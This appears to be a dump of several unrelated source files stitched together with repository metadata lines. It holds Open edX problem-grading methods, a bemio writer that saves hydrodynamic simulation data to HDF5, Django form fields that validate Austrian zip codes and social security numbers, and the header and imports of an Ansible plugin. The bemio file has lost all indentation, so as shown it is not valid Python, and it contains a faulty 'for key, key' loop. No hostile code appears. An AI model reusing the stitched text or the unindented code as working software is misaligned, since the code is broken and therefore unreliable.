        if not correct_map.is_correct(answer_id):
            success = 'incorrect'

    # NOTE: We are logging both full grading and queued-grading submissions. In the latter,
    #       'success' will always be incorrect
    event_info['grade'] = published_grade['grade']
    event_info['max_grade'] = published_grade['max_grade']
    event_info['correct_map'] = correct_map.get_dict()
    event_info['success'] = success
    event_info['attempts'] = self.attempts
    event_info['submission'] = self.get_submission_metadata_safe(answers_without_files, correct_map)
    self.track_function_unmask('problem_check', event_info)

    if dog_stats_api:
        dog_stats_api.increment(metric_name('checks'), tags=[u'result:success'])
        # NOTE(review): a problem with max_grade == 0 would raise
        # ZeroDivisionError here -- confirm max_grade is always positive.
        dog_stats_api.histogram(
            metric_name('correct_pct'),
            float(published_grade['grade']) / published_grade['max_grade'],
        )
        dog_stats_api.histogram(
            metric_name('attempts'),
            self.attempts,
        )

    if hasattr(self.runtime, 'psychometrics_handler'):  # update PsychometricsData using callback
        self.runtime.psychometrics_handler(self.get_state_for_lcp())

    # render problem into HTML
    html = self.get_problem_html(encapsulate=False)

    return {
        'success': success,
        'contents': html
    }
# pylint: enable=too-many-statements
def track_function_unmask(self, title, event_info):
    """
    Single funnel for runtime.track_function so masked choice names can
    be translated back before the event is emitted.
    """
    # Unmask a deep copy so a shared event_info is never unmasked twice.
    unmasked = copy.deepcopy(event_info)
    self.unmask_event(unmasked)
    self.runtime.track_function(title, unmasked)
def unmask_event(self, event_info):
    """
    Translates in-place the event_info to account for masking
    and adds information about permutation options in force.
    """
    # answers is like: {u'i4x-Stanford-CS99-problem-dada976e76f34c24bc8415039dee1300_2_1': u'mask_0'}
    # Each response values has an answer_id which matches the key in answers.
    for response in self.lcp.responders.values():
        # Un-mask choice names in event_info for masked responses.
        if response.has_mask():
            # We don't assume much about the structure of event_info,
            # but check for the existence of the things we need to un-mask.

            # Look for answers/id
            answer = event_info.get('answers', {}).get(response.answer_id)
            if answer is not None:
                event_info['answers'][response.answer_id] = response.unmask_name(answer)

            # Look for state/student_answers/id
            answer = event_info.get('state', {}).get('student_answers', {}).get(response.answer_id)
            if answer is not None:
                event_info['state']['student_answers'][response.answer_id] = response.unmask_name(answer)

            # Look for old_state/student_answers/id -- parallel to the above case, happens on reset
            answer = event_info.get('old_state', {}).get('student_answers', {}).get(response.answer_id)
            if answer is not None:
                event_info['old_state']['student_answers'][response.answer_id] = response.unmask_name(answer)

        # Add 'permutation' to event_info for permuted responses.
        # (This runs for every response, masked or not.)
        permutation_option = None
        if response.has_shuffle():
            permutation_option = 'shuffle'
        elif response.has_answerpool():
            permutation_option = 'answerpool'

        if permutation_option is not None:
            # Add permutation record tuple: (one of:'shuffle'/'answerpool', [as-displayed list])
            if 'permutation' not in event_info:
                event_info['permutation'] = {}
            event_info['permutation'][response.answer_id] = (permutation_option, response.unmask_order())
def pretty_print_seconds(self, num_seconds):
    """
    Return a duration formatted for humans, e.g. "3 minutes 4 seconds".

    Always emits "0 seconds" (never an empty string) for zero durations.
    """
    # ungettext is the N-variant gettext: the 3-arg call handles pluralization.
    ungettext = self.runtime.service(self, "i18n").ungettext
    hours, remainder = divmod(num_seconds, 3600)
    minutes, seconds = divmod(remainder, 60)

    pieces = []
    if hours > 0:
        pieces.append(ungettext("{num_hour} hour", "{num_hour} hours", hours).format(num_hour=hours))
    if minutes > 0:
        # translators: "minute" refers to a minute of time
        pieces.append(ungettext("{num_minute} minute", "{num_minute} minutes", minutes).format(num_minute=minutes))
    if seconds > 0 or (hours == 0 and minutes == 0):
        # translators: "second" refers to a second of time
        pieces.append(ungettext("{num_second} second", "{num_second} seconds", seconds).format(num_second=seconds))
    return " ".join(pieces)
def get_submission_metadata_safe(self, answers, correct_map):
    """
    Exception-proof wrapper around get_submission_metadata.

    Returns the metadata summary, or {} if building it raised anything:
    metadata generation must never block answer submission.
    """
    try:
        return self.get_submission_metadata(answers, correct_map)
    except Exception:  # pylint: disable=broad-except
        # Deep inspection of capa structures can break on uncommon problem
        # types; log it and let the event simply omit the metadata. Any
        # occurrences of errors here should be investigated and resolved.
        log.exception('Unable to gather submission metadata, it will not be included in the event.')
        return {}
def get_submission_metadata(self, answers, correct_map):
    """
    Return a map of inputs to their corresponding summarized metadata.

    Returns:
        A map whose keys are a unique identifier for the input (in this case a capa input_id) and
        whose values are:

            question (str): Is the prompt that was presented to the student.  It corresponds to the
                label of the input.
            answer (mixed): Is the answer the student provided.  This may be a rich structure,
                however it must be json serializable.
            response_type (str): The XML tag of the capa response type.
            input_type (str): The XML tag of the capa input type.
            correct (bool): Whether or not the provided answer is correct.  Will be an empty
                string if correctness could not be determined.
            variant (str): In some cases the same question can have several different variants.
                This string should uniquely identify the variant of the question that was answered.
                In the capa context this corresponds to the `seed`.

    This function attempts to be very conservative and make very few assumptions about the structure
    of the problem.  If problem related metadata cannot be located it should be replaced with empty
    strings ''.
    """
    input_metadata = {}
    for input_id, internal_answer in answers.iteritems():
        answer_input = self.lcp.inputs.get(input_id)

        if answer_input is None:
            log.warning('Input id %s is not mapped to an input type.', input_id)

        # Linear scan: find the responder that owns this input_id.
        answer_response = None
        for response, responder in self.lcp.responders.iteritems():
            if input_id in responder.answer_ids:
                answer_response = responder

        if answer_response is None:
            log.warning('Answer responder could not be found for input_id %s.', input_id)

        user_visible_answer = internal_answer
        if hasattr(answer_input, 'get_user_visible_answer'):
            user_visible_answer = answer_input.get_user_visible_answer(internal_answer)

        # If this problem has rerandomize enabled, then it will generate N variants of the
        # question, one per unique seed value. In this case we would like to know which
        # variant was selected. Ideally it would be nice to have the exact question that
        # was presented to the user, with values interpolated etc, but that can be done
        # later if necessary.
        variant = ''
        if self.rerandomize != RANDOMIZATION.NEVER:
            variant = self.seed

        is_correct = correct_map.is_correct(input_id)
        if is_correct is None:
            is_correct = ''

        input_metadata[input_id] = {
            'question': getattr(answer_input, 'loaded_attributes', {}).get('label', ''),
            'answer': user_visible_answer,
            'response_type': getattr(getattr(answer_response, 'xml', None), 'tag', ''),
            'input_type': getattr(answer_input, 'tag', ''),
            'correct': is_correct,
            'variant': variant,
        }

    return input_metadata
def rescore_problem(self):
    """
    Checks whether the existing answers to a problem are correct.

    This is called when the correct answer to a problem has been changed,
    and the grade should be re-evaluated.

    Returns a dict with one key:
        {'success' : 'correct' | 'incorrect' | AJAX alert msg string }

    Raises NotFoundError if called on a problem that has not yet been
    answered, or NotImplementedError if it's a problem that cannot be rescored.

    Returns the error messages for exceptions occurring while performing
    the rescoring, rather than throwing them.
    """
    event_info = {'state': self.lcp.get_state(), 'problem_id': self.location.to_deprecated_string()}
    _ = self.runtime.service(self, "i18n").ugettext

    # Not every response type supports rescoring; bail out early with a
    # tracked failure event so the request is visible in analytics.
    if not self.lcp.supports_rescoring():
        event_info['failure'] = 'unsupported'
        self.track_function_unmask('problem_rescore_fail', event_info)
        # Translators: 'rescoring' refers to the act of re-submitting a student's solution so it can get a new score.
        raise NotImplementedError(_("Problem's definition does not support rescoring."))

    # A problem with no submitted answers has nothing to rescore.
    if not self.done:
        event_info['failure'] = 'unanswered'
        self.track_function_unmask('problem_rescore_fail', event_info)
        raise NotFoundError(_("Problem must be answered before it can be graded again."))

    # get old score, for comparison:
    orig_score = self.lcp.get_score()
    event_info['orig_score'] = orig_score['score']
    event_info['orig_total'] = orig_score['total']

    try:
        correct_map = self.lcp.rescore_existing_answers()
    except (StudentInputError, ResponseError, LoncapaProblemError) as inst:
        # Expected, input-related failures: report the message to the caller
        # instead of raising, so the client sees an AJAX alert string.
        log.warning("Input error in capa_module:problem_rescore", exc_info=True)
        event_info['failure'] = 'input_error'
        self.track_function_unmask('problem_rescore_fail', event_info)
        return {'success': u"Error: {0}".format(inst.message)}
    except Exception as err:
        # Unexpected failures: only surface details (with traceback) in
        # DEBUG mode; otherwise re-raise for the outer error handling.
        event_info['failure'] = 'unexpected'
        self.track_function_unmask('problem_rescore_fail', event_info)
        if self.runtime.DEBUG:
            msg = u"Error checking problem: {0}".format(err.message)
            msg += u'\nTraceback:\n' + traceback.format_exc()
            return {'success': msg}
        raise

    # rescoring should have no effect on attempts, so don't
    # need to increment here, or mark done. Just save.
    self.set_state_from_lcp()
    self.publish_grade()

    new_score = self.lcp.get_score()
    event_info['new_score'] = new_score['score']
    event_info['new_total'] = new_score['total']

    # success = correct if ALL questions in this problem are correct
    success = 'correct'
    for answer_id in correct_map:
        if not correct_map.is_correct(answer_id):
            success = 'incorrect'

    # NOTE: We are logging both full grading and queued-grading submissions. In the latter,
    # 'success' will always be incorrect
    event_info['correct_map'] = correct_map.get_dict()
    event_info['success'] = success
    event_info['attempts'] = self.attempts
    self.track_function_unmask('problem_rescore', event_info)

    # psychometrics should be called on rescoring requests in the same way as check-problem
    if hasattr(self.runtime, 'psychometrics_handler'):  # update PsychometricsData using callback
        self.runtime.psychometrics_handler(self.get_state_for_lcp())

    return {'success': success}
def save_problem(self, data):
    """
    Save the learner's in-progress answers without grading them.

    Arguments:
        data: Raw submitted form data; converted to a dict of responses
            via ``make_dict_of_responses``.

    Returns a dict ``{'success': bool, 'msg': message}``.  The message is
    informative on success and explains the failure otherwise.
    """
    event_info = {
        'state': self.lcp.get_state(),
        'problem_id': self.location.to_deprecated_string(),
    }
    answers = self.make_dict_of_responses(data)
    event_info['answers'] = answers
    _ = self.runtime.service(self, "i18n").ugettext

    # Too late to save: the due date passed and attempts are limited.
    if self.closed() and self.max_attempts != 0:
        event_info['failure'] = 'closed'
        self.track_function_unmask('save_problem_fail', event_info)
        return {
            'success': False,
            # Translators: 'closed' means the problem's due date has passed. You may no longer attempt to solve the problem.
            'msg': _("Problem is closed.")
        }

    # Already submitted with always-on randomization: the learner must
    # reset before saving again.
    if self.done and self.rerandomize == RANDOMIZATION.ALWAYS:
        event_info['failure'] = 'done'
        self.track_function_unmask('save_problem_fail', event_info)
        return {
            'success': False,
            'msg': _("Problem needs to be reset prior to save.")
        }

    self.lcp.student_answers = answers
    self.set_state_from_lcp()
    self.track_function_unmask('save_problem_success', event_info)

    if self.max_attempts == 0:
        msg = _("Your answers have been saved.")
    else:
        msg = _(
            "Your answers have been saved but not graded. Click '{button_name}' to grade them."
        ).format(button_name=self.check_button_name())
    return {
        'success': True,
        'msg': msg,
    }
def reset_problem(self, _data):
    """
    Return the problem to an unanswered state, removing student answers.

    If randomization is enabled, a new seed is chosen so the re-rendered
    problem may be a different variant.

    Arguments:
        _data: Unused request payload (kept for handler signature parity).

    Returns a dictionary of the form:
        {'success': True/False,
         'html': Problem HTML string}
    On failure the dictionary instead carries an `error` key with a
    user-facing message.
    """
    event_info = {
        'old_state': self.lcp.get_state(),
        'problem_id': self.location.to_deprecated_string(),
    }
    _ = self.runtime.service(self, "i18n").ugettext

    if self.closed():
        event_info['failure'] = 'closed'
        self.track_function_unmask('reset_problem_fail', event_info)
        return {
            'success': False,
            # Translators: 'closed' means the problem's due date has passed. You may no longer attempt to solve the problem.
            'error': _("Problem is closed."),
        }

    if not self.is_submitted():
        event_info['failure'] = 'not_done'
        self.track_function_unmask('reset_problem_fail', event_info)
        return {
            'success': False,
            # Translators: A student must "make an attempt" to solve the problem on the page before they can reset it.
            'error': _("Refresh the page and make an attempt before resetting."),
        }

    # At this point the problem has been submitted, so only the
    # randomization mode decides whether a fresh seed is needed.
    if self.rerandomize in (RANDOMIZATION.ALWAYS, RANDOMIZATION.ONRESET):
        # Reset random number generator seed.
        self.choose_new_seed()

    # Generate a new problem with either the previous seed or a new seed
    self.lcp = self.new_lcp(None)

    # Pull in the new problem seed
    self.set_state_from_lcp()

    event_info['new_state'] = self.lcp.get_state()
    self.track_function_unmask('reset_problem', event_info)

    return {
        'success': True,
        'html': self.get_problem_html(encapsulate=False),
    }
| agpl-3.0 |
binit92/OpenWARP | Contest_Output/Test_Case_Implementations/Part1/source/automated_test/bemio/io/output.py | 6 | 17798 | import h5py
import numpy as np
from bemio.__version__ import base
def write_hdf5(bemio_obj,out_file=None):
'''
Function that writes NEMOH, WAMIT, or NEMOH data to a standard human
readable data format that uses the HDF5 format. This data can easily be
input into various codes, such as MATLAB, Python, C++, etc. The data can
easily be viewed using `HDFVIEW <https://www.hdfgroup.org/products/java/hdfview/>`_.
Parameters:
data_object : {bemio.io.NemohOutput, bamio.io.WamitOutput, bemio.io.AqwaOutput}
A data object created using the bemio.io data readers
out_file : str, optional
The name of the output file. The file should have the .h5 file
extension
Examples:
This example assumes there is a wamit output file called wamit.out that
is read using the bemio.io.wamit.read function
>>> from bemio.io.wamit import read
>>> from bemio.io.output import write_hdf5
>>> wamit_data = read(out_file=wamit.out)
>>> write_hdf5(wamit_data)
Writing HDF5 data to ./wamit.h5
'''
if out_file is None:
out_file = bemio_obj.files['hdf5']
print 'Writing HDF5 data to ' + out_file
with h5py.File(out_file, "w") as f:
for key, key in enumerate(bemio_obj.body.keys()):
# Body properities
cg = f.create_dataset('body' + str(key+1) + '/properties/cg',data=bemio_obj.body[key].cg)
cg.attrs['units'] = 'm'
cg.attrs['description'] = 'Center of gravity'
cb = f.create_dataset('body' + str(key+1) + '/properties/cb',data=bemio_obj.body[key].cb)
cb.attrs['units'] = 'm'
cb.attrs['description'] = 'Center of buoyancy'
vol = f.create_dataset('body' + str(key+1) + '/properties/disp_vol',data=bemio_obj.body[key].disp_vol)
vol.attrs['units'] = 'm^3'
vol.attrs['description'] = 'Displaced volume'
name = f.create_dataset('body' + str(key+1) + '/properties/name',data=bemio_obj.body[key].name)
name.attrs['description'] = 'Name of rigid body'
num = f.create_dataset('body' + str(key+1) + '/properties/body_number',data=bemio_obj.body[key].body_num)
num.attrs['description'] = 'Number of rigid body from the BEM simulation'
# Hydro coeffs
# Radiation IRF
try:
irf_rad_k_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/K',data=bemio_obj.body[key].rd.irf.K)
irf_rad_k_correct_loc.attrs['units'] = ''
irf_rad_k_correct_loc.attrs['description'] = 'Impulse response function'
irf_rad_t_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/t',data=bemio_obj.body[key].rd.irf.t)
irf_rad_t_correct_loc.attrs['units'] = 'seconds'
irf_rad_t_correct_loc.attrs['description'] = 'Time vector for the impulse response function'
irf_rad_w_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/w',data=bemio_obj.body[key].rd.irf.w)
irf_rad_w_correct_loc.attrs['units'] = 'seconds'
irf_rad_w_correct_loc.attrs['description'] = 'Interpolated frequencies used to compute the impulse response function'
irf_rad_l_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/L',data=bemio_obj.body[key].rd.irf.L)
irf_rad_l_correct_loc.attrs['units'] = ''
irf_rad_l_correct_loc.attrs['description'] = 'Time derivative of the impulse response function'
for m in xrange(bemio_obj.body[key].am.all.shape[0]):
for n in xrange(bemio_obj.body[key].am.all.shape[1]):
irf_rad_l_comp_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/components/L/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].rd.irf.t,bemio_obj.body[key].rd.irf.L[m,n,:]]).transpose())
irf_rad_l_comp_correct_loc.attrs['units'] = ''
irf_rad_l_comp_correct_loc.attrs['description'] = 'Components of the IRF'
irf_rad_k_comp_correct_loc = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/impulse_response_fun/components/K/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].rd.irf.t,bemio_obj.body[key].rd.irf.K[m,n,:]]).transpose())
irf_rad_k_comp_correct_loc.attrs['units'] = ''
irf_rad_k_comp_correct_loc.attrs['description'] = 'Components of the ddt(IRF): K'
except:
print '\tRadiation IRF functions for ' + bemio_obj.body[key].name + ' were not written.'
# Excitation IRF
try:
irf_ex_f = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/impulse_response_fun/f',data=bemio_obj.body[key].ex.irf.f)
irf_ex_f.attrs['units'] = ''
irf_ex_f.attrs['description'] = 'Impulse response function'
irf_ex_t = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/impulse_response_fun/w',data=bemio_obj.body[key].ex.irf.w)
irf_ex_w = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/impulse_response_fun/t',data=bemio_obj.body[key].ex.irf.t)
for m in xrange(bemio_obj.body[key].ex.mag.shape[0]):
for n in xrange(bemio_obj.body[key].ex.mag.shape[1]):
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/impulse_response_fun/components/f/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].ex.irf.t,bemio_obj.body[key].ex.irf.f[m,n,:]]).transpose())
irf_ex_f_comp.attrs['units'] = ''
irf_ex_f_comp.attrs['description'] = 'Components of the ddt(IRF): f'
except:
print '\tExcitation IRF functions for ' + bemio_obj.body[key].name + ' were not written.'
try:
ssRadfA = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/A/all',data=bemio_obj.body[key].rd.ss.A)
ssRadfA.attrs['units'] = ''
ssRadfA.attrs['description'] = 'State Space A Coefficient'
ssRadfB = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/B/all',data=bemio_obj.body[key].rd.ss.B)
ssRadfB.attrs['units'] = ''
ssRadfB.attrs['description'] = 'State Space B Coefficient'
ssRadfC = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/C/all',data=bemio_obj.body[key].rd.ss.C)
ssRadfC.attrs['units'] = ''
ssRadfC.attrs['description'] = 'State Space C Coefficient'
ssRadfD = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/D/all',data=bemio_obj.body[key].rd.ss.D)
ssRadfD.attrs['units'] = ''
ssRadfD.attrs['description'] = 'State Space D Coefficient'
r2t = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/r2t',data=bemio_obj.body[key].rd.ss.r2t)
r2t.attrs['units'] = ''
r2t.attrs['description'] = 'State space curve fitting R**2 value'
it = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/it',data=bemio_obj.body[key].rd.ss.it)
it.attrs['units'] = ''
it.attrs['description'] = 'Order of state space realization'
for m in xrange(bemio_obj.body[key].am.all.shape[0]):
for n in xrange(bemio_obj.body[key].am.all.shape[1]):
ss_A = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/A/components/' + str(m+1) + '_' + str(n+1),data=bemio_obj.body[key].rd.ss.A[m,n,:,:])
ss_A.attrs['units'] = ''
ss_A.attrs['description'] = 'Components of the State Space A Coefficient'
ss_B = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/B/components/' + str(m+1) + '_' + str(n+1),data=bemio_obj.body[key].rd.ss.B[m,n,:,:])
ss_B.attrs['units'] = ''
ss_B.attrs['description'] = 'Components of the State Space B Coefficient'
ss_C = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/C/components/' + str(m+1) + '_' + str(n+1),data=bemio_obj.body[key].rd.ss.C[m,n,:,:])
ss_C.attrs['units'] = ''
ss_C.attrs['description'] = 'Components of the State Space C Coefficient'
ss_D = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/state_space/D/components/' + str(m+1) + '_' + str(n+1),data=bemio_obj.body[key].rd.ss.D[m,n])
ss_D.attrs['units'] = ''
ss_D.attrs['description'] = 'Components of the State Space C Coefficient'
except:
print '\tRadiation state space coefficients for ' + bemio_obj.body[key].name + ' were not written.'
k = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/linear_restoring_stiffness',data=bemio_obj.body[key].k)
k.attrs['units'] = ''
k.attrs['description'] = 'Hydrostatic stiffness matrix'
exMag = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/mag',data=bemio_obj.body[key].ex.mag)
exMag.attrs['units'] = ''
exMag.attrs['description'] = 'Magnitude of excitation force'
exPhase = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/phase',data=bemio_obj.body[key].ex.phase)
exPhase.attrs['units'] = 'rad'
exPhase.attrs['description'] = 'Phase angle of excitation force'
exRe = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/re',data=bemio_obj.body[key].ex.re)
exRe.attrs['units'] = ''
exRe.attrs['description'] = 'Real component of excitation force'
exIm = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/im',data=bemio_obj.body[key].ex.im)
exIm.attrs['units'] = ''
exIm.attrs['description'] = 'Imaginary component of excitation force'
for m in xrange(bemio_obj.body[key].ex.mag.shape[0]):
for n in xrange(bemio_obj.body[key].ex.mag.shape[1]):
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation//components/mag/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T,bemio_obj.body[key].ex.mag[m,n,:]]).transpose())
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation//components/phase/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T,bemio_obj.body[key].ex.phase[m,n,:]]).transpose())
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation//components/re/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T,bemio_obj.body[key].ex.re[m,n,:]]).transpose())
irf_ex_f_comp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation//components/im/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T,bemio_obj.body[key].ex.im[m,n,:]]).transpose())
# Scattering and FK forces
try:
ex_sc_Mag = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/scattering/mag',data=bemio_obj.body[key].ex.sc.mag)
ex_sc_Mag.attrs['units'] = ''
ex_sc_Mag.attrs['description'] = 'Magnitude of excitation force'
ex_sc_Phase = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/scattering/phase',data=bemio_obj.body[key].ex.sc.phase)
ex_sc_Phase.attrs['units'] = 'rad'
ex_sc_Phase.attrs['description'] = 'Phase angle of excitation force'
ex_sc_Re = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/scattering/re',data=bemio_obj.body[key].ex.sc.re)
ex_sc_Re.attrs['units'] = ''
ex_sc_Re.attrs['description'] = 'Real component of excitation force'
ex_sc_Im = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/scattering/im',data=bemio_obj.body[key].ex.sc.im)
ex_sc_Im.attrs['units'] = ''
ex_sc_Im.attrs['description'] = 'Imaginary component of excitation force'
ex_fk_Mag = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/froud_krylof/mag',data=bemio_obj.body[key].ex.fk.mag)
ex_fk_Mag.attrs['units'] = ''
ex_fk_Mag.attrs['description'] = 'Magnitude of excitation force'
ex_fk_Phase = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/froud_krylof/phase',data=bemio_obj.body[key].ex.fk.phase)
ex_fk_Phase.attrs['units'] = 'rad'
ex_fk_Phase.attrs['description'] = 'Phase angle of excitation force'
ex_fk_Re = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/froud_krylof/re',data=bemio_obj.body[key].ex.fk.re)
ex_fk_Re.attrs['units'] = ''
ex_fk_Re.attrs['description'] = 'Real component of excitation force'
ex_fk_Im = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/excitation/froud_krylof/im',data=bemio_obj.body[key].ex.fk.im)
ex_fk_Im.attrs['units'] = ''
ex_fk_Im.attrs['description'] = 'Imaginary component of excitation force'
except:
pass
# Write added mass information
amInf = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/added_mass/inf_freq',data=bemio_obj.body[key].am.inf)
amInf.attrs['units for translational degrees of freedom'] = 'kg'
amInf.attrs['description'] = 'Infinite frequency added mass'
am = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/added_mass/all',data=bemio_obj.body[key].am.all)
am.attrs['units for translational degrees of freedom'] = 'kg'
am.attrs['units for rotational degrees of freedom'] = 'kg-m^2'
am.attrs['description'] = 'Added mass. Frequency is the third dimension of the data structure.'
for m in xrange(bemio_obj.body[key].am.all.shape[0]):
for n in xrange(bemio_obj.body[key].am.all.shape[1]):
amComp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/added_mass/components/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T, bemio_obj.body[key].am.all[m,n,:]]).transpose())
amComp.attrs['units'] = ''
amComp.attrs['description'] = 'Added mass components as a function of frequency'
radComp = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/components/' + str(m+1) + '_' + str(n+1),data=np.array([bemio_obj.body[key].T, bemio_obj.body[key].rd.all[m,n,:]]).transpose())
radComp.attrs['units'] = ''
radComp.attrs['description'] = 'Radiation damping components as a function of frequency'
rad = f.create_dataset('body' + str(key+1) + '/hydro_coeffs/radiation_damping/all',data=bemio_obj.body[key].rd.all)
rad.attrs['units'] = ''
rad.attrs['description'] = 'Radiation damping. Frequency is the thrid dimension of the data structure.'
# Simulation parameters
g = f.create_dataset('simulation_parameters/g',data=bemio_obj.body[key].g)
g.attrs['units'] = 'm/s^2'
g.attrs['description'] = 'Gravitational acceleration'
rho = f.create_dataset('simulation_parameters/rho',data=bemio_obj.body[key].rho)
rho.attrs['units'] = 'kg/m^3'
rho.attrs['description'] = 'Water density'
T = f.create_dataset('simulation_parameters/T',data=bemio_obj.body[key].T)
T.attrs['units'] = 's'
T.attrs['description'] = 'Wave periods'
w = f.create_dataset('simulation_parameters/w',data=bemio_obj.body[key].w)
w.attrs['units'] = 'rad/s'
w.attrs['description'] = 'Wave frequencies'
water_depth = f.create_dataset('simulation_parameters/water_depth',data=bemio_obj.body[key].water_depth)
water_depth.attrs['units'] = 'm'
water_depth.attrs['description'] = 'Water depth'
wave_dir = f.create_dataset('simulation_parameters/wave_dir',data=bemio_obj.body[key].wave_dir)
wave_dir.attrs['units'] = 'rad'
wave_dir.attrs['description'] = 'Wave direction'
scaled = f.create_dataset('simulation_parameters/scaled',data=bemio_obj.body[key].scaled)
scaled.attrs['description'] = 'True: The data is scaled by rho*g, False: The data is not scaled by rho*g'
bemio_version = f.create_dataset('bemio_information/version',data=base())
rawOut = f.create_dataset('bem_data/output',data=bemio_obj.body[key].bem_raw_data)
rawOut.attrs['description'] = 'Raw output from BEM code'
code = f.create_dataset('bem_data/code',data=bemio_obj.body[key].bem_code)
code.attrs['description'] = 'BEM code'
| apache-2.0 |
tianyi33/simple_blog | django/contrib/localflavor/at/forms.py | 109 | 2551 | """
AT-specific Form helpers
"""
from __future__ import unicode_literals
import re
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
re_ssn = re.compile(r'^\d{4} \d{6}')
class ATZipCodeField(RegexField):
    """
    Form field validating Austrian postal codes.

    A valid value consists of exactly four digits, the first of which
    must be non-zero.
    """
    default_error_messages = {
        'invalid': _('Enter a zip code in the format XXXX.'),
    }

    def __init__(self, max_length=None, min_length=None, *args, **kwargs):
        super(ATZipCodeField, self).__init__(
            r'^[1-9]{1}\d{3}$',
            max_length,
            min_length,
            *args,
            **kwargs
        )
class ATStateSelect(Select):
    """
    A ``Select`` widget whose choices are the Austrian federal states.
    """
    def __init__(self, attrs=None):
        # Deferred import: the state data is only loaded when the widget
        # is actually instantiated.
        from django.contrib.localflavor.at.at_states import STATE_CHOICES
        super(ATStateSelect, self).__init__(attrs, choices=STATE_CHOICES)
class ATSocialSecurityNumberField(Field):
    """
    Form field for Austrian Social Security Numbers.

    A number is composed of a 4-digit field and a 6-digit field, in the
    format ``XXXX XXXXXX``. The 4-digit field is a 3-digit serial counter
    followed by a one-digit checksum; the 6-digit field usually encodes the
    person's birthdate, but may differ from it if the serial counter
    suffered an overflow.

    This code is based on information available on
    http://de.wikipedia.org/wiki/Sozialversicherungsnummer#.C3.96sterreich
    """
    default_error_messages = {
        'invalid': _('Enter a valid Austrian Social Security Number in XXXX XXXXXX format.'),
    }

    # Weights applied, in order, to the three serial digits and the six
    # date digits when computing the mod-11 checksum.
    _CHECK_WEIGHTS = (3, 7, 9, 5, 8, 4, 2, 1, 6)

    def clean(self, value):
        value = super(ATSocialSecurityNumberField, self).clean(value)
        if value in EMPTY_VALUES:
            return ""
        if not re_ssn.search(value):
            raise ValidationError(self.error_messages['invalid'])

        four_digits, date = value.split(" ")
        serial, check = four_digits[:3], four_digits[3]

        # Serial numbers below 100 are never issued.
        if int(serial) < 100:
            raise ValidationError(self.error_messages['invalid'])

        checksum = sum(
            int(digit) * weight
            for digit, weight in zip(serial + date, self._CHECK_WEIGHTS)
        ) % 11
        if checksum != int(check):
            raise ValidationError(self.error_messages['invalid'])
        return '%s%s %s' % (serial, check, date)
| mit |
axtra/ansible | lib/ansible/runner/action_plugins/assemble.py | 109 | 6150 | # (c) 2013-2014, Michael DeHaan <michael.dehaan@gmail.com>
# Stephen Fromm <sfromm@gmail.com>
# Brian Coca <briancoca+dev@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
import os
import os.path
import pipes
import shutil
import tempfile
import base64
import re
from ansible import utils
